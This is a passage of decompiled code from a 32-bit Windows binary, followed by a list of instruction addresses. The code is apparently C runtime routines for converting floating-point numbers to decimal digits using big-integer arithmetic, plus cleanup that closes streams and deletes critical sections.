															_t1167 =  &_v1396;
														}
														_v1876 = _t1167;
														__eflags = _t930;
														if(_t930 == 0) {
															_t1108 = _v936;
														}
														_v1880 = _t1108;
														__eflags = _t930;
														if(_t930 != 0) {
															_v1892 = _v936;
														}
														_t1168 = 0;
														_t1260 = 0;
														_v1864 = 0;
														__eflags = _t1108;
														if(_t1108 == 0) {
															L177:
															_v936 = _t1168;
															_t932 = _t1168 << 2;
															__eflags = _t932;
															goto L178;
														} else {
															_t1216 = _t1215 -  &_v1860;
															__eflags = _t1216;
															_v1928 = _t1216;
															do {
																_t940 =  *(_t1276 + _t1216 + _t1260 * 4 - 0x740);
																_v1884 = _t940;
																__eflags = _t940;
																if(_t940 != 0) {
																	_t941 = 0;
																	_t1217 = 0;
																	_t1109 = _t1260;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1109 - 0x73;
																		if(_t1109 == 0x73) {
																			goto L187;
																		} else {
																			_t1216 = _v1928;
																			_t1108 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1109 - 0x73;
																			if(_t1109 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1109 - _t1168;
																			if(_t1109 == _t1168) {
																				 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) & 0x00000000;
																				_t953 = _t941 + 1 + _t1260;
																				__eflags = _t953;
																				_v1864 = _t953;
																				_t941 = _v1872;
																			}
																			_t948 =  *(_v1876 + _t941 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) + _t948 * _v1884 + _t1217;
																			asm("adc edx, 0x0");
																			_t941 = _v1872 + 1;
																			_t1109 = _t1109 + 1;
																			_v1872 = _t941;
																			_t1217 = _t948 * _v1884 >> 0x20;
																			_t1168 = _v1864;
																			__eflags = _t941 - _v1892;
																			if(_t941 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1217;
																				if(_t1217 == 0) {
																					goto L174;
																				}
																				__eflags = _t1109 - 0x73;
																				if(_t1109 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t943 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1109 - _t1168;
																					if(_t1109 == _t1168) {
																						_t370 = _t1276 + _t1109 * 4 - 0x740;
																						 *_t370 =  *(_t1276 + _t1109 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1109 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t946 = _t1217;
																					_t1217 = 0;
																					 *(_t1276 + _t1109 * 4 - 0x740) =  *(_t1276 + _t1109 * 4 - 0x740) + _t946;
																					_t1168 = _v1864;
																					asm("adc edi, edi");
																					_t1109 = _t1109 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1260 - _t1168;
																	if(_t1260 == _t1168) {
																		 *(_t1276 + _t1260 * 4 - 0x740) =  *(_t1276 + _t1260 * 4 - 0x740) & _t940;
																		_t338 = _t1260 + 1; // 0x1
																		_t1168 = _t338;
																		_v1864 = _t1168;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1260 = _t1260 + 1;
																__eflags = _t1260 - _t1108;
															} while (_t1260 != _t1108);
															goto L177;
														}
													} else {
														_t1218 = _v932;
														_v936 = _t1108;
														E00A2B851( &_v932, _t1067,  &_v1396, _t1108 << 2);
														_t1282 =  &(_t1282[4]);
														__eflags = _t1218;
														if(_t1218 != 0) {
															__eflags = _t1218 - 1;
															if(_t1218 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1110 = 0;
																	_v1884 = _v936;
																	_t1261 = 0;
																	__eflags = 0;
																	do {
																		_t961 = _t1218;
																		_t1169 = _t961 *  *(_t1276 + _t1261 * 4 - 0x3a0) >> 0x20;
																		 *(_t1276 + _t1261 * 4 - 0x3a0) = _t961 *  *(_t1276 + _t1261 * 4 - 0x3a0) + _t1110;
																		asm("adc edx, 0x0");
																		_t1261 = _t1261 + 1;
																		_t1110 = _t1169;
																		__eflags = _t1261 - _v1884;
																	} while (_t1261 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t933 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1219 = _v1396;
													__eflags = _t1219;
													if(_t1219 != 0) {
														__eflags = _t1219 - 1;
														if(_t1219 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1111 = 0;
																_v1884 = _v936;
																_t1262 = 0;
																__eflags = 0;
																do {
																	_t968 = _t1219;
																	_t1170 = _t968 *  *(_t1276 + _t1262 * 4 - 0x3a0) >> 0x20;
																	 *(_t1276 + _t1262 * 4 - 0x3a0) = _t968 *  *(_t1276 + _t1262 * 4 - 0x3a0) + _t1111;
																	asm("adc edx, 0x0");
																	_t1262 = _t1262 + 1;
																	_t1111 = _t1170;
																	__eflags = _t1262 - _v1884;
																} while (_t1262 != _v1884);
																L149:
																__eflags = _t1110;
																if(_t1110 == 0) {
																	goto L180;
																} else {
																	_t964 = _v936;
																	__eflags = _t964 - 0x73;
																	if(_t964 < 0x73) {
																		 *(_t1276 + _t964 * 4 - 0x3a0) = _t1110;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t943 =  &_v1396;
																		L188:
																		_push(_t943);
																		_push(_t1067);
																		_push( &_v932);
																		E00A2B851();
																		_t1282 =  &(_t1282[4]);
																		_t936 = 0;
																	}
																}
															}
														}
													} else {
														_t932 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t932);
														_t933 =  &_v1860;
														L179:
														_push(_t933);
														_push(_t1067);
														_push( &_v932);
														E00A2B851();
														_t1282 =  &(_t1282[4]);
														L180:
														_t936 = 1;
													}
												}
												L181:
												__eflags = _t936;
												if(_t936 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t855 =  &_v932;
													L262:
													_push(_t1067);
													_push(_t855);
													E00A2B851();
													_t1282 =  &(_t1282[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t911 = _v1908 - _v1888;
												__eflags = _t911;
												_v1908 = _t911;
											} while (_t911 != 0);
											_t1105 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1199 = _v1920;
									_t1248 = _t1199;
									_t1089 = _v472;
									_v1872 = _t1248;
									__eflags = _t1089;
									if(_t1089 != 0) {
										_t1252 = 0;
										_t1203 = 0;
										__eflags = 0;
										do {
											_t844 =  *(_t1276 + _t1203 * 4 - 0x1d0);
											_t1156 = 0xa;
											_t1157 = _t844 * _t1156 >> 0x20;
											 *(_t1276 + _t1203 * 4 - 0x1d0) = _t844 * _t1156 + _t1252;
											asm("adc edx, 0x0");
											_t1203 = _t1203 + 1;
											_t1252 = _t1157;
											__eflags = _t1203 - _t1089;
										} while (_t1203 != _t1089);
										_v1896 = _t1252;
										__eflags = _t1252;
										_t1248 = _v1872;
										if(_t1252 != 0) {
											_t1098 = _v472;
											__eflags = _t1098 - 0x73;
											if(_t1098 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E00A2B851( &_v468, _t1067,  &_v2404, 0);
												_t1282 =  &(_t1282[4]);
											} else {
												 *(_t1276 + _t1098 * 4 - 0x1d0) = _t1157;
												_v472 = _v472 + 1;
											}
										}
										_t1199 = _t1248;
									}
									_t816 = E00A2CEB0( &_v472,  &_v936);
									_t1149 = 0xa;
									__eflags = _t816 - _t1149;
									if(_t816 != _t1149) {
										__eflags = _t816;
										if(_t816 != 0) {
											_t817 = _t816 + 0x30;
											__eflags = _t817;
											_t1248 = _t1199 + 1;
											 *_t1199 = _t817;
											_v1872 = _t1248;
											goto L282;
										} else {
											_t818 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1248 = _t1199 + 1;
										_t835 = _v936;
										 *_t1199 = 0x31;
										_v1872 = _t1248;
										__eflags = _t835;
										if(_t835 != 0) {
											_t1202 = 0;
											_t1251 = _t835;
											_t1097 = 0;
											__eflags = 0;
											do {
												_t836 =  *(_t1276 + _t1097 * 4 - 0x3a0);
												 *(_t1276 + _t1097 * 4 - 0x3a0) = _t836 * _t1149 + _t1202;
												asm("adc edx, 0x0");
												_t1097 = _t1097 + 1;
												_t1202 = _t836 * _t1149 >> 0x20;
												_t1149 = 0xa;
												__eflags = _t1097 - _t1251;
											} while (_t1097 != _t1251);
											_t1248 = _v1872;
											__eflags = _t1202;
											if(_t1202 != 0) {
												_t839 = _v936;
												__eflags = _t839 - 0x73;
												if(_t839 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E00A2B851( &_v932, _t1067,  &_v2404, 0);
													_t1282 =  &(_t1282[4]);
												} else {
													 *(_t1276 + _t839 * 4 - 0x3a0) = _t1202;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t818 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t818;
									_t1073 = _v1916;
									__eflags = _t818;
									if(_t818 >= 0) {
										__eflags = _t1073 - 0x7fffffff;
										if(_t1073 <= 0x7fffffff) {
											_t1073 = _t1073 + _t818;
											__eflags = _t1073;
										}
									}
									_t820 = _a24 - 1;
									__eflags = _t820 - _t1073;
									if(_t820 >= _t1073) {
										_t820 = _t1073;
									}
									_t821 = _t820 + _v1920;
									_v1916 = _t821;
									__eflags = _t1248 - _t821;
									if(__eflags != 0) {
										while(1) {
											_t822 = _v472;
											__eflags = _t822;
											if(__eflags == 0) {
												goto L303;
											}
											_t1200 = 0;
											_t1249 = _t822;
											_t1093 = 0;
											__eflags = 0;
											do {
												_t823 =  *(_t1276 + _t1093 * 4 - 0x1d0);
												 *(_t1276 + _t1093 * 4 - 0x1d0) = _t823 * 0x3b9aca00 + _t1200;
												asm("adc edx, 0x0");
												_t1093 = _t1093 + 1;
												_t1200 = _t823 * 0x3b9aca00 >> 0x20;
												__eflags = _t1093 - _t1249;
											} while (_t1093 != _t1249);
											_t1250 = _v1872;
											__eflags = _t1200;
											if(_t1200 != 0) {
												_t829 = _v472;
												__eflags = _t829 - 0x73;
												if(_t829 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E00A2B851( &_v468, _t1067,  &_v2404, 0);
													_t1282 =  &(_t1282[4]);
												} else {
													 *(_t1276 + _t829 * 4 - 0x1d0) = _t1200;
													_v472 = _v472 + 1;
												}
											}
											_t828 = E00A2CEB0( &_v472,  &_v936);
											_t1201 = 8;
											_t1073 = _v1916 - _t1250;
											__eflags = _t1073;
											do {
												_t708 = _t828 % _v1912;
												_t828 = _t828 / _v1912;
												_t1154 = _t708 + 0x30;
												__eflags = _t1073 - _t1201;
												if(_t1073 >= _t1201) {
													 *((char*)(_t1201 + _t1250)) = _t1154;
												}
												_t1201 = _t1201 - 1;
												__eflags = _t1201 - 0xffffffff;
											} while (_t1201 != 0xffffffff);
											__eflags = _t1073 - 9;
											if(_t1073 > 9) {
												_t1073 = 9;
											}
											_t1248 = _t1250 + _t1073;
											_v1872 = _t1248;
											__eflags = _t1248 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1248 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1073 = _t1239 & 0x000fffff;
					if((_t1191 | _t1239 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0xa37db4);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1058);
						if(E00A287A4() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00A28B69();
							asm("int3");
							E00A1EFB0(_t1145, 0xa3bcc0, 0x10);
							_v32 = _v32 & 0x00000000;
							E00A2A701(8);
							_pop(_t1074);
							_t721 =  &_v8;
							 *_t721 = _v8 & 0x00000000;
							__eflags =  *_t721;
							_t1240 = 3;
							while(1) {
								_v36 = _t1240;
								__eflags = _t1240 -  *0xa6127c; // 0x200
								if(__eflags == 0) {
									break;
								}
								_t763 =  *0xa61280; // 0x0
								_t764 =  *(_t763 + _t1240 * 4);
								__eflags = _t764;
								if(_t764 != 0) {
									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
									if(__eflags != 0) {
										_t773 =  *0xa61280; // 0x0
										_push( *((intOrPtr*)(_t773 + _t1240 * 4)));
										_t774 = E00A2FA93(_t1074, _t1145, __eflags);
										__eflags = _t774 - 0xffffffff;
										if(_t774 != 0xffffffff) {
											_t731 =  &_v32;
											 *_t731 = _v32 + 1;
											__eflags =  *_t731;
										}
									}
									_t767 =  *0xa61280; // 0x0
									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1240 * 4)) + 0x20);
									_t770 =  *0xa61280; // 0x0
									E00A287FE( *((intOrPtr*)(_t770 + _t1240 * 4)));
									_pop(_t1074);
									_t772 =  *0xa61280; // 0x0
									_t737 = _t772 + _t1240 * 4;
									 *_t737 =  *(_t772 + _t1240 * 4) & 0x00000000;
									__eflags =  *_t737;
								}
								_t1240 = _t1240 + 1;
							}
							_v8 = 0xfffffffe;
							E00A2E791();
							return E00A1EFF6(_t1145);
						} else {
							L309:
							_t1289 = _v1936;
							if(_v1936 != 0) {
								E00A2EDF1(_t1073, _t1289,  &_v1944);
							}
							return E00A1EEFA(_v8 ^ _t1276);
						}
					}
				}
			}

































































































































































































































































                                                        0x00a2d35e
                                                        0x00a2d361
                                                        0x00a2d363
                                                        0x00a2d369
                                                        0x00a2d370
                                                        0x00a2d374
                                                        0x00a2d37d
                                                        0x00a2d37e
                                                        0x00a2d37f
                                                        0x00a2d382
                                                        0x00a2d388
                                                        0x00a2d38e
                                                        0x00a2d393
                                                        0x00a2d3a2
                                                        0x00a2d3a4
                                                        0x00a2d3a6
                                                        0x00a2d3a6
                                                        0x00a2d3ad
                                                        0x00a2d3b7
                                                        0x00a2d3bc
                                                        0x00a2d3bf
                                                        0x00a2d3e3
                                                        0x00a2d3e7
                                                        0x00a2d3ec
                                                        0x00a2d3ed
                                                        0x00a2d3ef
                                                        0x00a2d3f1
                                                        0x00a2d3f7
                                                        0x00a2d3f7
                                                        0x00a2d3fe
                                                        0x00a2d3fe
                                                        0x00a2d401
                                                        0x00a2e6b1
                                                        0x00000000
                                                        0x00a2d407
                                                        0x00a2d407
                                                        0x00a2d407
                                                        0x00a2d40a
                                                        0x00a2e6aa
                                                        0x00000000
                                                        0x00a2d410
                                                        0x00a2d410
                                                        0x00a2d410
                                                        0x00a2d413
                                                        0x00a2e6a3
                                                        0x00000000
                                                        0x00a2d419
                                                        0x00a2d419
                                                        0x00a2d41c
                                                        0x00a2e69c
                                                        0x00000000
                                                        0x00a2d422
                                                        0x00a2d42b
                                                        0x00a2d433
                                                        0x00a2d436
                                                        0x00a2d439
                                                        0x00a2d43c
                                                        0x00a2d442
                                                        0x00a2d44a
                                                        0x00a2d450
                                                        0x00a2d45a
                                                        0x00a2d45a
                                                        0x00a2d45d
                                                        0x00a2d465
                                                        0x00a2d46c
                                                        0x00a2d46c
                                                        0x00a2d45f
                                                        0x00a2d45f
                                                        0x00a2d461
                                                        0x00a2d474
                                                        0x00a2d47a
                                                        0x00a2d47c
                                                        0x00a2d480
                                                        0x00a2d485
                                                        0x00a2d492
                                                        0x00a2d494
                                                        0x00a2d49a
                                                        0x00a2d49f
                                                        0x00a2d4a0
                                                        0x00a2d4a1
                                                        0x00a2d4ab
                                                        0x00a2d4b0
                                                        0x00a2d4b6
                                                        0x00a2d4bb
                                                        0x00a2d4c4
                                                        0x00a2d4c4
                                                        0x00a2d4c6
                                                        0x00a2d4bd
                                                        0x00a2d4bd
                                                        0x00a2d4c2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d4c2
                                                        0x00a2d4cc
                                                        0x00a2d4d4
                                                        0x00a2d4d6
                                                        0x00a2d4df
                                                        0x00a2d4e0
                                                        0x00a2d4e6
                                                        0x00a2d4e8
                                                        0x00a2d8db
                                                        0x00a2d8e1
                                                        0x00a2da00
                                                        0x00a2da00
                                                        0x00a2da07
                                                        0x00a2da07
                                                        0x00a2da07
                                                        0x00a2da0e
                                                        0x00a2da11
                                                        0x00a2da18
                                                        0x00a2da18
                                                        0x00a2da13
                                                        0x00a2da13
                                                        0x00a2da13
                                                        0x00a2da1c
                                                        0x00a2da1d
                                                        0x00a2da1f
                                                        0x00a2da22
                                                        0x00a2da25
                                                        0x00a2da28
                                                        0x00a2da2e
                                                        0x00a2da31
                                                        0x00a2da34
                                                        0x00a2da3e
                                                        0x00a2da3e
                                                        0x00a2da3e
                                                        0x00a2da36
                                                        0x00a2da36
                                                        0x00a2da38
                                                        0x00000000
                                                        0x00a2da3a
                                                        0x00a2da3a
                                                        0x00a2da3a
                                                        0x00a2da38
                                                        0x00a2da40
                                                        0x00a2da42
                                                        0x00a2dae3
                                                        0x00a2dae3
                                                        0x00a2daf0
                                                        0x00a2daf0
                                                        0x00a2daf0
                                                        0x00a2db06
                                                        0x00a2db0b
                                                        0x00a2da48
                                                        0x00a2da48
                                                        0x00a2da4a
                                                        0x00000000
                                                        0x00a2da50
                                                        0x00a2da52
                                                        0x00a2da53
                                                        0x00a2da55
                                                        0x00a2da57
                                                        0x00a2da57
                                                        0x00a2da59
                                                        0x00a2da5c
                                                        0x00a2da64
                                                        0x00a2da66
                                                        0x00a2da69
                                                        0x00a2da6f
                                                        0x00a2da6f
                                                        0x00a2da71
                                                        0x00a2da7d
                                                        0x00a2da7d
                                                        0x00a2da7d
                                                        0x00a2da73
                                                        0x00a2da75
                                                        0x00a2da75
                                                        0x00a2da84
                                                        0x00a2da87
                                                        0x00a2da89
                                                        0x00a2da90
                                                        0x00a2da90
                                                        0x00a2da8b
                                                        0x00a2da8b
                                                        0x00a2da8b
                                                        0x00a2da98
                                                        0x00a2daa2
                                                        0x00a2daa8
                                                        0x00a2daa9
                                                        0x00a2daae
                                                        0x00a2dab4
                                                        0x00a2dab7
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2dab9
                                                        0x00a2dab9
                                                        0x00a2dac1
                                                        0x00a2dac1
                                                        0x00a2dac7
                                                        0x00a2dace
                                                        0x00a2dadb
                                                        0x00a2dad0
                                                        0x00a2dad0
                                                        0x00a2dad3
                                                        0x00a2dad3
                                                        0x00a2dace
                                                        0x00a2da4a
                                                        0x00a2db17
                                                        0x00a2db27
                                                        0x00a2db34
                                                        0x00a2db36
                                                        0x00a2db3d
                                                        0x00a2d8e7
                                                        0x00a2d8e7
                                                        0x00a2d8f0
                                                        0x00a2d8f1
                                                        0x00a2d8fb
                                                        0x00a2d901
                                                        0x00a2d903
                                                        0x00a2d909
                                                        0x00a2d909
                                                        0x00a2d90b
                                                        0x00a2d90b
                                                        0x00a2d912
                                                        0x00a2d919
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d91f
                                                        0x00a2d922
                                                        0x00a2d925
                                                        0x00000000
                                                        0x00a2d927
                                                        0x00a2d927
                                                        0x00a2d927
                                                        0x00a2d927
                                                        0x00a2d92e
                                                        0x00a2d931
                                                        0x00a2d938
                                                        0x00a2d938
                                                        0x00a2d933
                                                        0x00a2d933
                                                        0x00a2d933
                                                        0x00a2d93c
                                                        0x00a2d93f
                                                        0x00a2d941
                                                        0x00a2d943
                                                        0x00a2d949
                                                        0x00a2d94f
                                                        0x00a2d951
                                                        0x00a2d951
                                                        0x00a2d951
                                                        0x00a2d958
                                                        0x00a2d958
                                                        0x00a2d95a
                                                        0x00a2d966
                                                        0x00a2d966
                                                        0x00a2d966
                                                        0x00a2d95c
                                                        0x00a2d95e
                                                        0x00a2d95e
                                                        0x00a2d96d
                                                        0x00a2d970
                                                        0x00a2d972
                                                        0x00a2d979
                                                        0x00a2d979
                                                        0x00a2d974
                                                        0x00a2d974
                                                        0x00a2d974
                                                        0x00a2d981
                                                        0x00a2d98c
                                                        0x00a2d992
                                                        0x00a2d993
                                                        0x00a2d998
                                                        0x00a2d99e
                                                        0x00a2d9a1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d9a3
                                                        0x00a2d9a3
                                                        0x00a2d9ad
                                                        0x00a2d9b8
                                                        0x00a2d9c0
                                                        0x00a2d9c6
                                                        0x00a2d9d1
                                                        0x00a2d9d7
                                                        0x00a2d9de
                                                        0x00a2d9f1
                                                        0x00a2d9f8
                                                        0x00a2d9f8
                                                        0x00000000
                                                        0x00a2d925
                                                        0x00a2d90b
                                                        0x00000000
                                                        0x00a2d903
                                                        0x00a2db40
                                                        0x00a2db40
                                                        0x00a2db46
                                                        0x00a2db4b
                                                        0x00a2db51
                                                        0x00a2db64
                                                        0x00a2db69
                                                        0x00a2d4ee
                                                        0x00a2d4ee
                                                        0x00a2d4f7
                                                        0x00a2d4f8
                                                        0x00a2d502
                                                        0x00a2d508
                                                        0x00a2d50a
                                                        0x00a2d710
                                                        0x00a2d718
                                                        0x00a2d71b
                                                        0x00a2d720
                                                        0x00a2d723
                                                        0x00a2d72b
                                                        0x00a2d72f
                                                        0x00a2d735
                                                        0x00a2d73b
                                                        0x00a2d740
                                                        0x00a2d747
                                                        0x00a2d748
                                                        0x00a2d748
                                                        0x00a2d748
                                                        0x00a2d74f
                                                        0x00a2d752
                                                        0x00a2d75a
                                                        0x00a2d760
                                                        0x00a2d765
                                                        0x00a2d765
                                                        0x00a2d762
                                                        0x00a2d762
                                                        0x00a2d762
                                                        0x00a2d769
                                                        0x00a2d76a
                                                        0x00a2d76c
                                                        0x00a2d76f
                                                        0x00a2d775
                                                        0x00a2d77b
                                                        0x00a2d77e
                                                        0x00a2d781
                                                        0x00a2d787
                                                        0x00a2d78a
                                                        0x00a2d78d
                                                        0x00a2d797
                                                        0x00a2d797
                                                        0x00a2d797
                                                        0x00a2d78f
                                                        0x00a2d78f
                                                        0x00a2d791
                                                        0x00000000
                                                        0x00a2d793
                                                        0x00a2d793
                                                        0x00a2d793
                                                        0x00a2d791
                                                        0x00a2d799
                                                        0x00a2d79b
                                                        0x00a2d88d
                                                        0x00a2d88d
                                                        0x00a2d88f
                                                        0x00a2d895
                                                        0x00a2d89b
                                                        0x00a2d8b0
                                                        0x00a2d8b5
                                                        0x00a2d7a1
                                                        0x00a2d7a1
                                                        0x00a2d7a3
                                                        0x00000000
                                                        0x00a2d7a9
                                                        0x00a2d7ab
                                                        0x00a2d7ac
                                                        0x00a2d7ae
                                                        0x00a2d7b0
                                                        0x00a2d7b2
                                                        0x00a2d7b2
                                                        0x00a2d7b8
                                                        0x00a2d7ba
                                                        0x00a2d7c0
                                                        0x00a2d7c3
                                                        0x00a2d7d1
                                                        0x00a2d7d7
                                                        0x00a2d7d7
                                                        0x00a2d7d9
                                                        0x00a2d7dc
                                                        0x00a2d7e2
                                                        0x00a2d7e2
                                                        0x00a2d7e4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d7e6
                                                        0x00a2d7e8
                                                        0x00a2d7ee
                                                        0x00a2d7ee
                                                        0x00a2d7ea
                                                        0x00a2d7ea
                                                        0x00a2d7ea
                                                        0x00a2d7f3
                                                        0x00a2d7f5
                                                        0x00a2d7fc
                                                        0x00a2d7fc
                                                        0x00a2d7f7
                                                        0x00a2d7f7
                                                        0x00a2d7f7
                                                        0x00a2d822
                                                        0x00a2d828
                                                        0x00a2d82b
                                                        0x00a2d831
                                                        0x00a2d838
                                                        0x00a2d839
                                                        0x00a2d83a
                                                        0x00a2d840
                                                        0x00a2d843
                                                        0x00a2d845
                                                        0x00000000
                                                        0x00a2d845
                                                        0x00000000
                                                        0x00a2d843
                                                        0x00a2d84d
                                                        0x00a2d853
                                                        0x00a2d85b
                                                        0x00a2d85b
                                                        0x00a2d85c
                                                        0x00a2d85e
                                                        0x00a2d862
                                                        0x00a2d86a
                                                        0x00a2d86a
                                                        0x00a2d86a
                                                        0x00a2d86c
                                                        0x00a2d873
                                                        0x00a2d878
                                                        0x00a2d885
                                                        0x00a2d87a
                                                        0x00a2d87d
                                                        0x00a2d87d
                                                        0x00a2d878
                                                        0x00a2d7a3
                                                        0x00a2d8b8
                                                        0x00a2d8c2
                                                        0x00a2d8c8
                                                        0x00a2d8ce
                                                        0x00a2d8d4
                                                        0x00a2d510
                                                        0x00a2d510
                                                        0x00a2d510
                                                        0x00a2d512
                                                        0x00a2d519
                                                        0x00a2d520
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d526
                                                        0x00a2d529
                                                        0x00a2d52c
                                                        0x00000000
                                                        0x00a2d52e
                                                        0x00a2d536
                                                        0x00a2d53b
                                                        0x00a2d540
                                                        0x00a2d541
                                                        0x00a2d543
                                                        0x00a2d54b
                                                        0x00a2d54f
                                                        0x00a2d555
                                                        0x00a2d55b
                                                        0x00a2d560
                                                        0x00a2d567
                                                        0x00a2d567
                                                        0x00a2d568
                                                        0x00a2d56b
                                                        0x00a2d573
                                                        0x00a2d579
                                                        0x00a2d57e
                                                        0x00a2d57e
                                                        0x00a2d57b
                                                        0x00a2d57b
                                                        0x00a2d57b
                                                        0x00a2d582
                                                        0x00a2d583
                                                        0x00a2d585
                                                        0x00a2d588
                                                        0x00a2d58e
                                                        0x00a2d594
                                                        0x00a2d597
                                                        0x00a2d59a
                                                        0x00a2d5a0
                                                        0x00a2d5a3
                                                        0x00a2d5a6
                                                        0x00a2d5b0
                                                        0x00a2d5b0
                                                        0x00a2d5b0
                                                        0x00a2d5a8
                                                        0x00a2d5a8
                                                        0x00a2d5aa
                                                        0x00000000
                                                        0x00a2d5ac
                                                        0x00a2d5ac
                                                        0x00a2d5ac
                                                        0x00a2d5aa
                                                        0x00a2d5b2
                                                        0x00a2d5b4
                                                        0x00a2d6a9
                                                        0x00a2d6a9
                                                        0x00a2d6ab
                                                        0x00a2d6b1
                                                        0x00a2d6b7
                                                        0x00a2d6cc
                                                        0x00a2d6d1
                                                        0x00a2d5ba
                                                        0x00a2d5ba
                                                        0x00a2d5bc
                                                        0x00000000
                                                        0x00a2d5c2
                                                        0x00a2d5c4
                                                        0x00a2d5c5
                                                        0x00a2d5c7
                                                        0x00a2d5c9
                                                        0x00a2d5cb
                                                        0x00a2d5cb
                                                        0x00a2d5d1
                                                        0x00a2d5d3
                                                        0x00a2d5d9
                                                        0x00a2d5dc
                                                        0x00a2d5ea
                                                        0x00a2d5f0
                                                        0x00a2d5f0
                                                        0x00a2d5f2
                                                        0x00a2d5f5
                                                        0x00a2d5fb
                                                        0x00a2d5fb
                                                        0x00a2d5fd
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d5ff
                                                        0x00a2d601
                                                        0x00a2d607
                                                        0x00a2d607
                                                        0x00a2d603
                                                        0x00a2d603
                                                        0x00a2d603
                                                        0x00a2d60c
                                                        0x00a2d60e
                                                        0x00a2d61b
                                                        0x00a2d61b
                                                        0x00a2d610
                                                        0x00a2d616
                                                        0x00a2d616
                                                        0x00a2d639
                                                        0x00a2d641
                                                        0x00a2d648
                                                        0x00a2d64f
                                                        0x00a2d650
                                                        0x00a2d653
                                                        0x00a2d659
                                                        0x00a2d65f
                                                        0x00a2d662
                                                        0x00a2d664
                                                        0x00000000
                                                        0x00a2d664
                                                        0x00000000
                                                        0x00a2d662
                                                        0x00a2d66c
                                                        0x00a2d672
                                                        0x00a2d672
                                                        0x00a2d678
                                                        0x00a2d67a
                                                        0x00a2d684
                                                        0x00a2d686
                                                        0x00a2d686
                                                        0x00a2d686
                                                        0x00a2d688
                                                        0x00a2d68f
                                                        0x00a2d694
                                                        0x00a2d6a1
                                                        0x00a2d696
                                                        0x00a2d699
                                                        0x00a2d699
                                                        0x00a2d694
                                                        0x00a2d5bc
                                                        0x00a2d6d4
                                                        0x00a2d6df
                                                        0x00a2d6e0
                                                        0x00a2d6e1
                                                        0x00a2d6e7
                                                        0x00a2d6ed
                                                        0x00a2d6f3
                                                        0x00a2d6f3
                                                        0x00000000
                                                        0x00a2d52c
                                                        0x00000000
                                                        0x00a2d512
                                                        0x00a2d6f4
                                                        0x00a2d6fa
                                                        0x00a2d701
                                                        0x00a2d702
                                                        0x00a2d703
                                                        0x00a2d708
                                                        0x00a2d708
                                                        0x00a2db6c
                                                        0x00a2db76
                                                        0x00a2db77
                                                        0x00a2db7d
                                                        0x00a2db7f
                                                        0x00a2dfe8
                                                        0x00a2dfea
                                                        0x00a2dfec
                                                        0x00a2dff2
                                                        0x00a2dff4
                                                        0x00a2dffa
                                                        0x00a2dffc
                                                        0x00a2e34e
                                                        0x00a2e34e
                                                        0x00a2e350
                                                        0x00a2e356
                                                        0x00a2e35d
                                                        0x00a2e363
                                                        0x00a2e365
                                                        0x00a2e403
                                                        0x00a2e403
                                                        0x00a2e405
                                                        0x00a2e406
                                                        0x00a2e40c
                                                        0x00000000
                                                        0x00a2e36b
                                                        0x00a2e36b
                                                        0x00a2e36e
                                                        0x00a2e374
                                                        0x00a2e37a
                                                        0x00a2e37c
                                                        0x00a2e382
                                                        0x00a2e384
                                                        0x00a2e384
                                                        0x00a2e386
                                                        0x00a2e386
                                                        0x00a2e38f
                                                        0x00a2e396
                                                        0x00a2e39c
                                                        0x00a2e39f
                                                        0x00a2e3a0
                                                        0x00a2e3a2
                                                        0x00a2e3a2
                                                        0x00a2e3a6
                                                        0x00a2e3a8
